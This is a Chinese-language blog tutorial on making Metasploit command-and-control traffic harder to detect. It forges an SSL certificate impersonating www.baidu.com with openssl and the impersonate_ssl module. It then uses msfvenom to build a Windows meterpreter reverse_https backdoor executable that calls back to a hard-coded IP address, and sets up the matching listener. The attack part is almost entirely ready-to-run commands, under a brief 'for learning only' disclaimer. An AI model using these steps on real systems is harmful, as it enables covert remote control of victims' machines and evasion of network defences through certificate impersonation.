MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

免责声明:本文仅做技术交流与学习...

目录

步骤:

[1-利用 openssl 生成证书](#1-利用 openssl 生成证书)

[1-impersonate_ssl 模块 --生成证书](#1-impersonate_ssl 模块 --生成证书)

​编辑

[2.MSF 生成绑定证书后门:](#2.MSF 生成绑定证书后门:)

[3.MSF 监听上线:](#3.MSF 监听上线:)

证书伪造

https流量加密


-解决 HTTPS-SSL 通讯证书被特征标示问题

步骤:

1-利用 openssl 生成证书

复制代码
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

1-impersonate_ssl 模块 --生成证书

复制代码
此外 Metasploit 框架还有一个 auxiliary/gather/impersonate_ssl 模块,可以用来自动从信任源创建一个虚假证书,十分方便: 
use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com 
run 
--->.pem


2.MSF 生成绑定证书后门:

复制代码
msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell 
HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe 

3.MSF 监听上线:

复制代码
use exploit/multi/handler 
set payload windows/meterpreter/reverse_https 
set lhost 0.0.0.0 
set lport 5566 
set HandlerSSLCert /root/www.baidu.com.pem 
set StagerVerifySSLCert true 
run 

---可以访问https看看证书

证书伪造


https流量加密


相关推荐
小羊Yveesss3 分钟前
2026年外贸建站服务器怎么选?访问速度、稳定性和海外收录怎么判断
大数据·运维·服务器
AI创界者6 分钟前
【实战演练】基于 Kali Linux 的自动化漏洞扫描与安全加固指南
网络·安全·web安全
听你说3233 分钟前
五新智能:以成套智能装备赋能全球工程建设
安全·创业创新
小五传输1 小时前
内外网文件交换系统产品推荐 解决隔离网络文件交换5类难题
大数据·运维·安全
从零开始的代码生活_1 小时前
Linux epoll 多路转接详解
linux·运维·网络·后端·tcp/ip·计算机网络·php
小鹿软件办公1 小时前
通过调整编码参数使用 VLC 媒体播放器无损压缩视频方法
运维·网络·音视频
Zhan8611241 小时前
西班牙股票行情数据API的WebSocket接入:IBEX35指数实时推送与数据清洗
python·websocket·网络协议
随风一样自由2 小时前
【WSL+Linux】国内网络连接微软官方服务器(或GitHub)不稳定,导致下载内核或Linux发行版时超时断开如何解决?
linux·服务器·wsl
源图客2 小时前
Claude Code基础使用
服务器·前端·数据库
清晨曦月2 小时前
【从零构建分布式在线评测系统】二、Judge0服务器上的心跳程序
运维·服务器·分布式